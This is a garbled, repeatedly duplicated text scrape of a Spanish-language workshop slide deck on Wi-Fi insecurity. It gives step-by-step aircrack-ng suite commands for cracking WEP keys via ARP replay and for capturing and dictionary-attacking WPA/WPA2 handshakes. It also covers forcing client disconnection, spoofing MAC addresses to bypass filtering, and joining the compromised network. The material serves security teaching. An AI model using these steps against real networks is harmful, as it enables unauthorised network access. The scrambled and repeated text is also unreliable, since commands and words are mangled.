httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
